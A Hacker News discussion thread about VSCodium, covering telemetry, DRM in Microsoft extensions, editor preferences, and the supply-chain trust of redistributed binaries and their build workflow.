[HN Gopher] VSCodium - Open-source binaries of VSCode
___________________________________________________________________
VSCodium - Open-source binaries of VSCode
Author : Brajeshwar
Score : 407 points
Date : 2023-09-04 15:20 UTC (7 hours ago)
(HTM) web link (vscodium.com)
(TXT) w3m dump (vscodium.com)
| hmry wrote:
| Just had to switch away from an open source build yesterday
| because after updating, Pylance seems to have stopped working due
| to DRM. Whenever it booted up, it just displayed a big warning
| about how using it with non-MS-sanctioned builds is a violation
| of the license, and promptly locked up.
| inetknght wrote:
| sounds like a reason to not use Pylance
| maxloh wrote:
| You can use pyright instead[0]. It is the FOSS version of
| pyright, but having some features missing.
|
| [0]: https://github.com/microsoft/pyright
| loloquwowndueo wrote:
| Vscode is designed to fracture https://ghuntley.com/fracture/
| eddythompson80 wrote:
| by that definition, I'm finding really hard to think of any
| product that allows for extensibility/extensions that won't be
| "designed to fracture".
| omoikane wrote:
| Previously discussed in 2022:
| https://news.ycombinator.com/item?id=32657709
|
| Summary: Microsoft releases Visual Studio Code with telemetry
| built in, so other projects (e.g. VSCodium) have spun up to
| release custom builds without telemetry. But these projects
| can't use the same marketplace because they are not licensed by
| Microsoft, hence the "fracture" in the title of this article.
| It goes on to say that other proprietary IDEs are also
| problematic, and GitHub is a trap to capture and fracture
| developers.
|
| This drama with Microsoft and open source reminds me of the
| Halloween documents:
|
| http://www.catb.org/~esr/halloween/
| SV_BubbleTime wrote:
| The main point that post _eventually_ gets to is that Microsoft
| made the best IDE and the best extensions... so now it 's hard
| to not use Microsoft with all the bad things that implies.
|
| Um... OK?
|
| I mean... Use it or don't. I'm not sure, "it's just too good
| not to use" is a legitimate complaint.
| BossingAround wrote:
| Can you change font size of the menus in VSCodium nowadays? I
| couldn't do that some time ago, and it was, quite honestly, a
| deal breaker for me.
| dewey wrote:
| I saw another mention of this in the comments. How can this be
| affected by "removing tracking and branding and building our
| own binaries"?
|
| Shouldn't the be almost the same minus these small MS specific
| bits?
|
| I think this would make me even more hesitant to use it if it
| introduces subtle changes / maybe bugs into the equation.
| banana_giraffe wrote:
| Can you do this in VS Code?
|
| You can set the window Zoom Level to change all of the font
| sizes, including the menu, but afaik, there's no option for
| just the menu font size.
| hedora wrote:
| At least under Linux, the menus are native widgets so you set
| the menu font size under system settings.
|
| I guess if you want one size of menu font for VS Code, and a
| different size for everything else, then that's a problem.
|
| That seems like a pretty narrow corner case though.
| stonogo wrote:
| Linux doesn't have native widgets. Are we talking GTK or QT
| here?
| semiquaver wrote:
| This project is mostly useless, and I say that as someone who
| uses ungoogled chromium as their primary browser.
|
| The only apparent practical reason for this to exist is to
| disable telemetry. But the telemetry built into VSCode can
| already be completely disabled by configuration. And if you don't
| trust that configuration to do what it says on the tin you should
| also not trust a piece of software built from the same source.
| mcpackieh wrote:
| Are VSCode builds reproducible?
| [deleted]
| bobim wrote:
| Interesting point, I'm using Codium exactly for this wrong
| reason then. In the end trusting or untrusting without the
| intellectual capacity required to verify is no different from
| faith. That's maybe why 100's rabbits approach to computing
| with uxn is so appealing.
| zogrodea wrote:
| I think trust is a strict synonym of faith, capacity to
| verify or no. Trust means to believe someone's claims,
| without certain 100% demonstrative proof. It ceases to be
| trust when you verify the claims yourself, but the capacity
| to verify makes no difference to what it is.
|
| Not that trust is bad or anything. I remember hearing from
| someone that it used to be safe to keep house doors open,
| because people trusted each other, and that it's safe for a 6
| year old girl to travel by train alone in some places. Can't
| help but feel we have lost something.
| infamia wrote:
| With Vscodium you also aren't exposed to all the closed source
| extensions (e.g. Pylance). MS aggresively pushes proprietary
| extensions on everyone, which does only heaven knows what to
| your data and machine. Vscode is in all practical purposes open
| core surrounded by a lot of closed source. This despite the
| fact that they like to pretend they altruistically love open
| source.
|
| Same old MS as ever. Only trust what you can verify with that
| lot.
| [deleted]
| vvpan wrote:
| Arch has, what I think is, an equivalent package simply called
| "code".
| [deleted]
| capableweb wrote:
| `code` is the binary, but the "project" itself is `Code - OSS`
| as listed on
| https://wiki.archlinux.org/title/Visual_Studio_Code
|
| It is the package the main repository exposes, for VSCodium or
| Visual Studio Code you need to use the AUR.
| lfc07 wrote:
| Use Emacs guys if it is so bother some. Emacs is faster and more
| resource efficient than all these modern ide/editors.
| kenny11 wrote:
| This argument makes me smile as someone who is old enough to
| remember when Emacs stood for "eight megabytes and constantly
| swapping".
| mcpackieh wrote:
| The old GNU mentality of ignoring performance optimization
| because computer hardware would catch up eventually actually
| did pay off.
| yaantc wrote:
| Same here ;) But now there's "8 GB and constantly swapping":
| Eclipse! I logged once on a dev server to test something, it
| was slow and I checked what was going on. On this 64 GB
| machine, 8 Eclipse users, each Eclipse using a tad over 8 GB,
| led to significant swapping. What a world!
| BearhatBeer wrote:
| It also has a consistent interface that YOU control yourself.
| Downside is you need an IQ of at least 95 to use it.
| mardifoufs wrote:
| Vscode is super easy to configure yourself. I'd argue
| probably easier to customize fully than emacs for the average
| user. That's the whole point of using it versus a fully
| fledged opinionated IDE.
| BearhatBeer wrote:
| The average user can barely hit the space bar with their
| forehead. Creating programming tools designed for the
| average user will always be a study in mediocrity.
| uw_rob wrote:
| Configuring emacs isn't a test of intelligence, it's a
| test of investment. I wish the mindset that conflates
| intelligence and investment would go away.
|
| Software is going to continue to play a bigger influence
| on everyones life. The majority of this software is going
| to be written by engineers of average intelligence.
| Having tools that are easier for everyone to use will
| make your life better down the line too.
| [deleted]
| dr_kretyn wrote:
| > Libre open source
|
| It's like a "quantum plasma" of razors but for "hackers" of
| hacker news
| [deleted]
| alias_neo wrote:
| I used this for ages, and asked my team to use it, but I gave up
| in the end; without the remote SSH capabilities and
| devcontainers, Microsoft have a tight hold on using VSCode to the
| max.
|
| On top of that, they seem to have relented in the telemetry and
| it can be fully disabled now (though I haven't tested the truth
| of "off").
| baristaGeek wrote:
| Keep it going! Our startup's extension is listed on Open VSX
| Registry and we're very happy doing so.
| pcdoodle wrote:
| I heard MS was discontinuing mac support, does this release
| change anything?
| wyozi wrote:
| This is about VSCode. MS is discontinuing Mac support for
| Visual Studio.
| moonchrome wrote:
| It's not even support for visual studio - it's a completely
| different product spun out of monodevelop they acquired with
| xamarin.
|
| Anything xamarin related (MAUI, VS for Mac) is extreme level
| of garbage - such low standard of quality is really doing
| .NET/Visual Studio brands a disservice.
| qwytw wrote:
| Seems that they've pretty much just bought Xamarin to kill
| it (besides actually properly porting .NET itself to other
| platforms which they could've done anyway). It seemed like
| a pretty cool product showing some promise 7-8 years ago.
| apfsx wrote:
| Pretty sure that's only for Visual Studio not VS Code.
| qwytw wrote:
| They are discontinuing Visual Studio for Mac aka Xamarin Studio
| aka Monodevelop.
|
| Visual Studio Code is a completely different product (to be
| fair so is Visual Studio itself for that matter..)
| Evidlo wrote:
| Why did Microsoft overload the "Visual" keyword so much. It's
| almost a joke at this point.
|
| Visual Studio Code, Visual Studio, Visual Basic .NET, Visual
| Basic Classic, VBScript.
|
| Am I forgetting anything?
| SoftTalker wrote:
| Visual Source Safe, but that's best forgotten.
| Pxtl wrote:
| Microsoft has always been terrible at naming things.
|
| Their word processor is called Word. Their sql server is
| called Sql Server. Their IM is called MSN Messenger/Windows
| Live Messenger/Messenger/Skype/Lync/Skype For
| Business/Teams
| wvenable wrote:
| Don't all companies do that. Even Apple isn't immune with
| the ridiculously named AirPods Max.
| dagw wrote:
| Visual C++, Visual J++, Visual FoxPro, Visual SourceSafe,
| [deleted]
| wlesieutre wrote:
| Different software, Visual Studio Code is continuing, Visual
| Studio for Mac is being discontinued.
| dang wrote:
| Related:
|
| _VSCodium - Free /Libre Open Source Software Binaries of VS
| Code_ - https://news.ycombinator.com/item?id=31604932 - June 2022
| (430 comments)
|
| _VS Code without Microsoft branding /telemetry/licensing_ -
| https://news.ycombinator.com/item?id=23447413 - June 2020 (200
| comments)
|
| _VSCodium - An Open Source Visual Studio Code Without Trackers_
| - https://news.ycombinator.com/item?id=19650109 - April 2019 (253
| comments)
|
| _VSCodium: 100% Open Source Version of vs. Code_ -
| https://news.ycombinator.com/item?id=19619956 - April 2019 (8
| comments)
|
| _VSCodium: Binary releases of VSCode without MS branding,
| telemetry and licensing_ -
| https://news.ycombinator.com/item?id=17850960 - Aug 2018 (113
| comments)
| haolez wrote:
| Maybe I'm a bit paranoid, but I find it harder to trust the
| binaries generated by such a project than the ones provided by
| the Big Techs (even though they are the biggest stalkers).
|
| I'm afraid that such projects, with much less man power and skin
| in the game, are more vulnerable to supply chain attacks or a
| hostile takeover if a dev sells the project.
|
| I'm not very knowledgeable in this area. Would someone contribute
| here some resources on how this is avoided in such projects? Or
| maybe my concerns are valid :)
| ninjha wrote:
| I would have assumed the win here would be that your Linux
| distribution or package manager on another OS can compile
| "VSCodium" themselves -- and you already trust them for all
| your other software, so this simplifies the trust chain
| somewhat.
|
| In reality I think distributions that are willing to ship
| binaries (NixOS, Homebrew on MacOS) ship VSCodium, and other
| distributions (Alpine) have packages called things like `code-
| oss` that are basically the distribution's internal compiled
| version of VSCode and have nothing (?) to do with VSCodium.
| Barrin92 wrote:
| It's not paranoid, the scepticism is completely warranted as
| this is security theatre. People are afraid Microsoft will
| screw them over with a text editor but run random binaries
| provided by people for whom a thousand bucks may as well be
| enough motivation to ship you malware.
|
| It's like buying your heart medication off an anonymous guy on
| Craigslist to stick it to big pharma.
| RunSet wrote:
| Buying it for libre dollars and free cents.
| skybrian wrote:
| Yes, I also trust the original company more, for now. It would
| be nice to have more choices.
|
| Reproducible builds would help here, like Go did for their
| newest SDK [1].
|
| This would be particularly true for a fork when the source
| changes are fairly minimal, since you could just verify the
| patch.
|
| Linux distros are fairly similar; why do we mostly trust Debian
| packages? Because there's an umbrella organization and a
| process. That's less true of a standalone organization.
|
| Maybe eventually there will be an umbrella organization that
| just does reproducible builds, and people will use that to
| distribute binaries. (And independent verification could keep
| them honest, like happens with domain registrars.)
|
| [1] https://go.dev/blog/rebuild
| brnt wrote:
| Vscode packaging as/is famously not public. Plus, trust to do
| what exactly? Come with telemetry flipped on?
| haolez wrote:
| Good point. That's one problem that might be well solved by
| something like BitTorrent, which hashes all the files as part
| of the protocol. Once a binary gets analyzed and trusted (the
| current binary, not the process or every new upgrade), it can
| be safely used.
| slim wrote:
| it is less vulnerable simply because it's less used. hackers
| target the supply chain with the majority of consumers
| asddubs wrote:
| I think skin in the game is the big one, much moreso than
| manpower. I use a lot of things that are probably mostly one-
| person projects, but if that person poured their love and time
| into it, it seems unlikely they'd permanently tarnish not just
| their reputation, but also the thing they spent all this time
| on. If you're just setting a couple compile flags and changing
| a name, I am a little more suspicious
| beAbU wrote:
| This is what happened to FileZilla I think?
| davidgerard wrote:
| It could be much worse - you could install the official vendor
| binary, which is known to contain spyware.
| 3np wrote:
| Example Arch AUR but similar for Nix, Guix, Gentoo, others:
| On first install: - read AUR file - audit build &
| patching framework - audit patches On upgrade:
| - review patch changes - treat upstream changes like you
| would otherwise On upgrade with AUR file change:
| - review AUR file changes - review build & patching
| framework changes
|
| If you've bothered to set up your own repos and build pipeline
| integrating your patches already (and you can get a lot of that
| for free), the additional overhead isn't as large as it may
| sound.
|
| vscodium is doing the much larger work of cross-checking vscode
| and in exchange I do the smaller work of cross-checking theirs
| - and putting in my own so I have zeroconf installs with
| prebundled extensions and whatnot on new machines.
|
| Same for browser (ungoogled-chromium, vanadium, librewolf or
| whathaveyou)
| hedora wrote:
| I just installed vscodium on my manjaro machine. It built from
| the AUR source.
|
| I'm sure you could diff the source code the package used, and
| the upstream Microsoft git SHA it is claims to be derived from:
|
| https://aur.archlinux.org/packages/vscodium
|
| Incidentally, there is now an open source remote mode
| extension, so I have no reason to use the proprietary version.
| No more telemetry from me!
| yencabulator wrote:
| > there is now an open source remote mode extension
|
| URL please? Open VSX lists several but it's hard to evaluate
| if they're complete & stable from just the READMEs. For
| example, https://github.com/xaberus/vscode-remote-oss has
| existed for a long time, but one would need to spend a few
| hours to know if it works well enough.
| dataflow wrote:
| I've never tried this, but in theory, if these projects produce
| builds on GitHub Actions and you trust Microsoft's security,
| then you should be able to just look at the commit hash that
| got pulled in the action and diff that against upstream and
| just study that. If the diff looks safe [1] then I think that
| implies the binary can be trusted.
|
| [1] Of course this includes ensuring it doesn't e.g. pull
| anything from the internet whose integrity you can't similarly
| guarantee...
| krick wrote:
| Somebody please bother to explain why this is downvoted. The
| reasoning seems perfectly valid. Of course, there are a lot
| of ways how somebody could fuck up, but _in theory_ automated
| builds on github have the same trustworthiness guarantees as
| Microsoft 's very own VSCode binaries.
| danpalmer wrote:
| Your concerns are absolutely valid. Without casting any
| judgement on this project, the process of taking, modifying,
| and redistributing is hard to do in a trustworthy way. Big
| companies go to extreme lengths to ensure a chain of trust of
| the software they build, and app distribution platforms[^1] go
| to extreme lengths to ensure a full chain of trust end-to-
| end[^2] from developer to apps running on users devices.
|
| There's basically no way to do this without trusting the
| redistributor in addition to the original publisher, but some
| things can reduce the amount of trust. Having a verifiable
| build process, that checks signing keys and hashes, that re-
| signs, etc, that all helps. If end-users can theoretically
| produce exactly the same build themselves it's easier to trust
| it.
|
| The best option however is for the source project to produce
| unbranded builds themselves, and potentially for a project like
| VSCodium to become "config only" for things like disabling
| telemetry, and therefore not requiring re-signing. The Chromium
| project distributes its own Chromium binaries which lack the
| Google-specific stuff for example.
|
| [^1]: Mostly thinking of app stores, but the same is basically
| true of things like Debian package repositories.
|
| [^2]: App stores typically re-sign in the middle, so you do
| have to trust the store, but see (1), these companies go to
| great lengths to ensure trustworthiness there.
| sqeaky wrote:
| Trusting "big companies" because we presume they have guard
| rails seems like a bad idea, it is how we got the solar winds
| supply chain attack.
|
| When I worked for one of the largest voting machine companies
| I was astounded how the final build process for the software
| was done just before it was sent to the customer. It was
| built on a Jenkins server that several people had access to
| change and update with minimal oversight and the devops
| person had freedom to do anything to with no oversight. For
| the year I worked there this one man could have changed
| dozens of elections if he chose to and figuring it out would
| have been very hard. I am sure a large enough investigation
| could could have figured out such a thing, but by then the
| damage would already be done. If he changed only municipal
| elections that couldn't affors such an investigation it might
| never have been done. I have no reason to claim this
| happened, but we certainly can't prove it didn't and this is
| in one of the most paranoid and regulated spaces in software
| development.
| danpalmer wrote:
| I'm speaking from experience at Google, and honestly our
| software integrity processes are like nothing I could have
| imagined coming in. Not everything is perfect and it has
| clearly evolved over time, but basically for a modern
| internal Google codebase I don't think I could have much
| more trust that it is what it claims to be.
|
| I don't know if other big tech is quite the same, but from
| the little I've heard, I suspect that Microsoft, Amazon,
| Apple, and others in that ilk are similar.
|
| I'm very much in the camp of "trust but verify" here.
| You're right that Solar Winds was an utter disaster. It
| should never have been able to happen.
| dv_dt wrote:
| Microsoft has had some serious recent faults in their
| fundamental handling of a couple of areas (like driver
| signing! https://news.ycombinator.com/item?id=37261500).
| MaxBarraclough wrote:
| And that's on top of Azure's recent appearance in the
| news.
|
| https://news.ycombinator.com/item?id=36979532 (
| _Microsoft comes under blistering criticism for "grossly
| irresponsible" security_ )
| phillipcarter wrote:
| Trusting "open source" is also how we get tons of other
| kinds of vulnerabilities, but that doesn't mean open source
| is unworthy of trust.
|
| The reason why organizations turn to other companies to
| deliver this is because there's a "throat to choke" for
| when things go wrong and a financial incentive to fix the
| inevitable issues when they come up.
| Nullabillity wrote:
| The best option would have been for the source project to not
| be distributing malware in the first place.
| gustavus wrote:
| Ya I used to buy into that idea about using vendor products
| with the rationale that "at very least they wouldn't want to
| get sued for negligence so they have to have some basic
| security in place" then that huge bug came out where you got
| root access in Azure if you simply didn't send an AuthN
| header.
| justinhj wrote:
| Well let's not forget the importance of being able to sue.
| You use free software without warranty there is nobody to
| sue.
| MaxBarraclough wrote:
| You can use a commercial (paid-for) Linux distro if you
| really want the legal protections of being a customer,
| while staying with Free and Open Source software.
|
| As Capricorn2481 points out though, suing isn't really on
| the cards for most individual.
| yencabulator wrote:
| Good luck trying to sue Microsoft over a security
| vulnerability.
| mcny wrote:
| I think it is worth mentioning here that Microsoft does
| not care about user privacy.
|
| I don't know if this is because Microsoft took down the
| blog posts and press releases or because Google web
| search sucks now (different conversation) but I had
| trouble finding the source for Microsoft statement. I'm
| talking about the incident when Microsoft spied into a
| user's hotmail email contents.
|
| > However, to determine the identity of the leaker, CNET
| reveals, Microsoft actually looked through the Hotmail
| email of a French blogger who was in contact with the
| leaker, and make available online early copies of Windows
| 7 and Windows 8, as well as means that allowed users to
| circumvent activations protection for Microsoft and
| Windows.
|
| https://bgr.com/general/microsoft-hotmail-and-outlook-
| privac...
|
| I wouldn't give Microsoft any benefit of the doubt. While
| I have utmost respect for the people (who I know and) who
| work there, the senior leadership has always been poopy
| at best. I would never trust a word they say.
| Capricorn2481 wrote:
| "Yeah but you can sue" is not really that viable. How's
| that going for anybody? Not everyone can dedicate their
| time and savings to gambling on getting compensated. At
| the very least, the open source community is vigilant and
| quick to ostracize bad actors. Big tech companies get tax
| breaks to screw us over
| fallat wrote:
| > There's basically no way to do this without trusting the
| redistributor in addition to the original publisher, but some
| things can reduce the amount of trust. Having a verifiable
| build process, that checks signing keys and hashes, that re-
| signs, etc, that all helps. If end-users can theoretically
| produce exactly the same build themselves it's easier to
| trust it.
|
| Really what much else could you ask for?
|
| It only takes 1 trusted friend to verify the codebase, and
| from there it can spread. Luckily there are a lot of talented
| people on the Internet whom several people can vouch for,
| easy to find. It's pretty much a non-problem in the age of
| the Internet.
|
| The same natural logic applies to anything else really...
| like cars - "yo what car do you trust?"
|
| It's just the nature of living. If you don't have the skills,
| you need to find someone who does to trust. And no just
| because it comes from a company doesn't mean you can trust
| it, that's a fallacy. "Safety" doesn't necessary equate to
| "profits" which is what a business needs to live. It's an
| organism.
| danpalmer wrote:
| I'm certainly not equating safety to profits, but I think
| that a company such as Microsoft with decades of experience
| distributing cryptographically verified software to a range
| of demanding consumers (e.g. governments) and being big
| enough to be able to have teams running things like their
| certificate authority infrastructure, is much more likely
| to produce secure binary distributions than some GitHub
| Actions and shell scripts.
|
| I don't think your car analogy quite fits, as there are
| ongoing updates, and it's not like the end-user perception
| of regular VSCode, or backdoored VSCode, are going to be
| any different until someone spots the backdoor (and we
| can't rely on that).
| yencabulator wrote:
| Meanwhile in the real world, Microsoft is actively
| screwing up, losing control of their signing keys,
| failing to implementing even basics of Azure
| authentication, destroying Azure customer VM security,
| and so on.
|
| https://news.ycombinator.com/item?id=37261500
|
| https://news.ycombinator.com/item?id=28347141
|
| https://news.ycombinator.com/item?id=28532531
| fallat wrote:
| Seems your assumptions about their practices are wrong
| based on the other comment, but let's pretend that's the
| truth.
|
| Why would a GitHub Action be worse? You're just telling
| me it is, asking me to believe that...
|
| The car analogy is just that - you can break any analogy
| if you try. You've got a better one to help prove me
| right? :)
| [deleted]
| wredue wrote:
| >big companies go to great lengths to ensure chain of trust
|
| lol.
| croes wrote:
| Isn't VSCodium just VSCode without the telemetry code?
|
| So if there is a supply chain risk it's the same for VS Code
| krick wrote:
| You're missing the point. GP is discussing binaries. I.e.,
| the assumption is that published source code (on Github) is
| perfectly fine, and then either the (malign) developer is
| changing the code before compiling it, or the (malign) third
| party is somehow using some vulnerability to replace the
| official binaries with compiled code of their own. And then
| you think that you are using "VSCode without the telemetry
| code", but in reality you're running a botnet.
| Retr0id wrote:
| The supply chain does not end at the source code.
| croes wrote:
| What does VSCodium add?
| jamesgeck0 wrote:
| If their CI is one day compromised by an attacker,
| potentially anything.
| croes wrote:
| Just like MS's CI, and I guess MS is the more valuable
| target.
| fredoliveira wrote:
| But one might also assume, the hardest target to actually
| hit.
| d0mine wrote:
| - option A: definite known spyware; - option B: maybe
| potentially one day there is an attack/take over.
|
| The choice is obvious.
| gostsamo wrote:
| this is using the ms source, just not the logo and signing key.
| should be as safe as they come.
| robinwassen wrote:
| The problem is most likely how do you know it's the ms source
| unmodified?
| wheelerof4te wrote:
| You don't, unless you build it yourself.
|
| That's the key value of open-source projects. You don't
| have to release a binary, just source code and a build
| guide. It's also one of the reasons why I have such high
| respect for OS distributions like BSDs and Slackware. They
| give you a good base that you can build upon if you know
| what you're doing.
|
| The problem is, many PC users don't really know what
| they're doing.
| no_wizard wrote:
| >many PC users
|
| I'd say most, even software engineers.
|
| Can't tell you how many times I've had to explain how
| environmental variables work to developers, and that's a
| pretty simple concept compared to many other things in an
| operating system.
| Pxtl wrote:
| Most people cut their teeth on Windows, where the system
| environment bars are just a basically a section of the
| registry.
| vorticalbox wrote:
| Becuase the repo uses github actions to pull changes and
| build the binary
|
| https://github.com/VSCodium/vscodium/blob/master/.github/wo
| r...
| danpalmer wrote:
| Having had a quick look through this workflow it seems to
| miss _most_ opportunities to ensure a safe build.
|
| - Downloads binaries for use in build with no
| hash/signing verification.
|
| - Doesn't pin shared actions.
|
| - Uses Yarn to install dependencies (which can involve
| downloading/executing arbitrary code from anywhere)
|
| - Doesn't sign the final binary.
|
| None of this is necessarily _wrong_ , all would make
| maintenance harder in the long run, but it means this
| project is really about removing MS branding and some
| telemetry, and that there is a security trade-off to get
| those benefits.
| benatkin wrote:
| None of these are a big deal.
|
| > - Downloads binaries for use in build with no
| hash/signing verification.
|
| It downloads them using TLS.
|
| > - Doesn't pin shared actions.
|
| The shared actions are just @actions/checkout and
| @actions/setup-node. They're official. I wouldn't pin
| them - YAGNI.
|
| > - Uses Yarn to install dependencies (which can involve
| downloading/executing arbitrary code from anywhere)
|
| It downloads/executes code based on the carefully chosen
| dependencies
|
| > - Doesn't sign the final binary.
|
| That's platform dependent I think. For Mac OS X it does.
|
| Seems like FUD, which you might be able to recognize
| because you say "None of this is necessarily wrong".
| Especially the part about pinning first party GitHub
| Actions. There would be nothing wrong with that but it is
| much more useful to pin third party GitHub Actions, and
| IMHO suboptimal to pin first party actions.
| vladvasiliu wrote:
| Isn't the whole point of this comment thread
| "vulnerabilities to supply chain attacks"?
|
| >> - Downloads binaries for use in build with no
| hash/signing verification.
|
| > It downloads them using TLS.
|
| If the binary is updated to a shady version, sure, no one
| will be able to tamper with the download, they're certain
| to have received the correct shady stuff.
| danpalmer wrote:
| Ah yes it does sign on macOS.
|
| I don't think it's quite FUD, but I do agree none of
| these are strictly necessary, all can be rationalised as
| unnecessary and for many users this project probably
| provides a perfectly reasonable security posture. However
| the fact that there's so little explicit acknowledgement
| of the security concerns, and that 2 minutes looking at
| the repo turned these things up, suggests that security
| is not a priority of the project. Again, not the wrong
| thing to do, but maybe not the trade-offs all users will
| want.
|
| Pinning actions is so low effort/high reward that even
| the low risk makes it worth it for a project like this in
| my opinion. Official actions are certainly much safer,
| but ultimately it's still just human review and PRs being
| merged.
|
| Downloading over TLS negates some impact of hash/signing
| verification, but it would be a nice extra layer. You're
| otherwise putting a lot of trust in the combination of
| DNS+CDN+Hosting. I've seen hijacked sites due to IPs
| being re-used on cloud providers for example. Unlikely,
| but again easy to do and high impact in the rare
| situation that is is taken advantage of.
|
| Yarn dependencies may be carefully chosen, I'm not
| familiar with the VSCode practices. I bet that official
| binaries however are not built like this - I'd bet that
| there are allowances for specific network connectivity
| and binary execution, and that everything else is locked
| down. To my knowledge GitHub Actions have open internet
| access. I wouldn't even say this is low risk either, the
| NPM ecosystem is so deeply nested that I'm sure malicious
| code could be snuck in somewhere. This is a lot harder to
| solve for this project, and certainly the most debatable
| aspect as to whether it's worth it or not.
| lozenge wrote:
| The yarn.lock includes checksums, if yarn is not checking
| checksums properly then that affects every project in
| Node.js, not just this one.
|
| Malicious code with the correct checksum? VSCode team is
| not auto updating dependencies but I also doubt they are
| reviewing the source code of every package they update.
| I've never worked anywhere that does. So yeah, "gulp-
| vinyl-zip" (or any other package used at build time)
| could add some code that secretly triggers when run in
| the VSCode repository and makes some malicious source
| code changes. But, it's still going to be the same code
| in VSCode and VSCodium. Unless the attacker decides to
| use specific logic to target one or the other.
| benatkin wrote:
| > low effort/high reward
|
| Are there any shared actions that aren't actions/name-of-
| project? If not, that's zero reward.
| danpalmer wrote:
| The signing key is the important bit though right? This
| project breaks the chain of trust, as it clones the source
| repo, [does some shady stuff?] builds a new release, and
| uploads it to GitHub.
|
| It's unlikely that this project knowingly does shady stuff -
| I've heard of it before, seems to be a long running legit
| project - but there are lots of unverified factors in that,
| and the lack of signing (I think?) on the final binaries also
| means it's hard to know if they get tampered with at some
| other step.
| dist-epoch wrote:
| Your approach is valid, if you also avoid npm/pip/cargo/...
| packages. Otherwise...
| lathiat wrote:
| On the one hand there is 100% validity to what you say. On the
| other, people download entire trees of dependencies from pypi,
| npm, homebrew, independent non sandboxed apps, chrome
| extensions, etc.
|
| So don't lull yourself into thinking the supply chain on
| everything on your system is any better :) It's likely
| substantially worse.
| Xelbair wrote:
| with how the current tech world is, and after working in it,
| I'm the opposite.
|
| I have absolutely 0 trust towards any big corp doing things
| properly, and not cramming the applications full of spyware in
| the name of telemetry. and i would rather trust a bunch of
| insane dedicated people trying to make FOSS software.
| eternityforest wrote:
| I trust big tech more than most FOSS.
|
| I'm not worried about the government spying on me or ad
| tracking, I'm worried about a random hacker.
|
| It's ironic that for a lot of people the concept of privacy has
| been inverted: The closer someone is to you the more we want to
| hide from them.
|
| Facebook showing my online status to acquaintances(Or the lack
| of an online status, which could also create suspicion that I'm
| hiding something) bothers me more often than a random Google
| employee listening in through my alarm clock.
| pulpfictional wrote:
| It's not ironic, it's concern over the influence big tech
| yields over society with said data, unlike your concerns
| which are scoped on you and immediate.
| eternityforest wrote:
| The majority of people seem to have immediate -scoped
| concerns I suppose.
|
| Most of the really scary big data possibilities seems more
| like political issues than data issues, the data is just
| something they could use to do the things people are
| worried about.
|
| It's not great, but it's competing for mind share with a
| lot of other possibile horrors people are afraid of and
| people are rather fatigued.
|
| The more subtle stuff they're already doing seems like it
| would be a problem with even the most basic data.
|
| The biggest issue I see is personalized content which
| causes fights, hate, wasted time, and all that, because the
| algorithms want you to engage with it as much as possible,
| and it shits on real journalism by giving all the attention
| to clickbaits.
|
| I suspect every time I've responded to such clickbaits
| might be more problematic than all the data they get from
| all my smart devices in a year...
|
| Protecting one's privacy because of societal harm is a
| worthy thing but also a pretty big effort and I sure don't
| have a solution, or even any confident prediction of how
| big the problem is or where it's coming from...
|
| But I probably won't truly be worried unless one of those
| horrid encryption bans gets close to passing.
| pulpfictional wrote:
| > The majority of people seem to have immediate -scoped
| concerns I suppose.
|
| Well, like you write, aggregated data is already being
| used to influence populations which makes it immediate.
| An hypothetical hacker is not.
|
| > Most of the really scary big data possibilities seems
| more like political issues than data issues, the data is
| just something they could use to do the things people are
| worried about.
|
| I don't follow. Not giving away the data removes the need
| for politics. Crime is illegal nevertheless it exists
| because it is possible to commit.
|
| > It's not great, but it's competing for mind share with
| a lot of other possibile horrors people are afraid of and
| people are rather fatigued.
|
| Not everyone shares the same concerns and nobody likes
| problems, that doesn't' mean they should be accepted.
|
| > The more subtle stuff they're already doing seems like
| it would be a problem with even the most basic data.
|
| All the more reason not to give them more. The
| personalized hate content is a direct consequence of big
| data aggregation.
|
| All in all, seems like more of an issue than a possible
| compromise of a FOSS project.
| yjftsjthsd-h wrote:
| > Telemetry is disabled.
|
| Er...
|
| https://github.com/VSCodium/vscodium/blob/master/DOCS.md#dis...
|
| > Even though we do not pass the telemetry build flags (and go
| out of our way to cripple the baked-in telemetry), Microsoft will
| still track usage by default.
| [deleted]
| pests wrote:
| I think it's just badly worded.
| nate-sys wrote:
| It's on brand.
| gostsamo wrote:
| MS eliminated any competition from this direction by limiting
| their main extensions to the official release only. I'm
| personally using the remote extensions quite a lot and if someone
| can provide an alternative there, it would be great.
| andrepd wrote:
| I think the alternative is just not using VS code. I use it at
| work, because it is officially supported by the IT dept and I
| don't care about tracking. But for my personal work I still use
| sublime.
| seabrookmx wrote:
| Sublime is not a real alternative though if you rely on
| VSCode's remote extensions.
| andrepd wrote:
| Ah fair, I don't use that for my personal work anywhere
| though, so it's not an issue for me.
| mardifoufs wrote:
| The remote extension on jetbrains is not even remotely
| comparable to even just the base remote ssh vscode. Much
| less the remote container, dev container and tunnels
| (plus stuff like one click integration to Azure)
| gostsamo wrote:
| sublime is not accessible with my screen reader
| Liquix wrote:
| There is a section in the docs regarding switching back to the
| official extension marketplace:
| https://github.com/VSCodium/vscodium/blob/master/DOCS.md#how...
|
| So if there is a "killer extension" not available on codium's
| marketplace, you can still use it through microsoft's
| marketplace.
| circuit10 wrote:
| You can also download the vsix file from the website and load
| it in
| foob wrote:
| You can switch the extension marketplace, but Microsoft uses
| DRM in their extensions to prevent them from running with
| non-proprietary builds [1]. Pylance, their Python LSP, is one
| notable example [2]. Their earlier Python LSP was open
| source, but the community forks have lost a lot of the wind
| in their sails because such a large portion of developers use
| VC Code without realizing or caring that the LSP is DRM-laden
| and closed source. I believe the traditional term for this is
| _embrace, extend, extinguish._
|
| [1] - https://parsiya.net/blog/2021-12-20-rce-in-visual-
| studio-cod...
|
| [2] - https://github.com/microsoft/pylance-release/issues/746
| cypress66 wrote:
| Wow, vscode extensions having drm is insane
| vladvasiliu wrote:
| This alone, to me, means that MS is up to something
| shady. Maybe not right now, maybe not tomorrow, but it's
| surely on their roadmap.
|
| I don't see why they'd put out an open-source app, whose
| most useful extensions only work if you accept a closed
| binary known to phone home.
|
| I can see them trying to win goodwill from devs and steer
| them to their Azure/Windows offerings by releasing such
| an editor. But why insist on this telemetry-laden
| distribution, which is still free-as-in-beer?
| bitwize wrote:
| You know the "Editor Wars" meme? That was a thing because
| vim and Emacs were the _canonical_ editors; you could
| expect just about every serious hacker (in a Unix
| environment) to main either one or the other.
|
| Today, there is only one canonical editor: Visual Studio
| Code. 75% of professional programmers use it. Microsoft
| was trying to get the open source crowd back into their
| tooling fold -- and they've succeeded! Which means now
| they have a hugely expanded developer base to sell tools
| and services to. Remember their money is now in cloud,
| not desktop software -- so think things like GitHub
| Codespaces. (The entire devcontainer ecosystem comes from
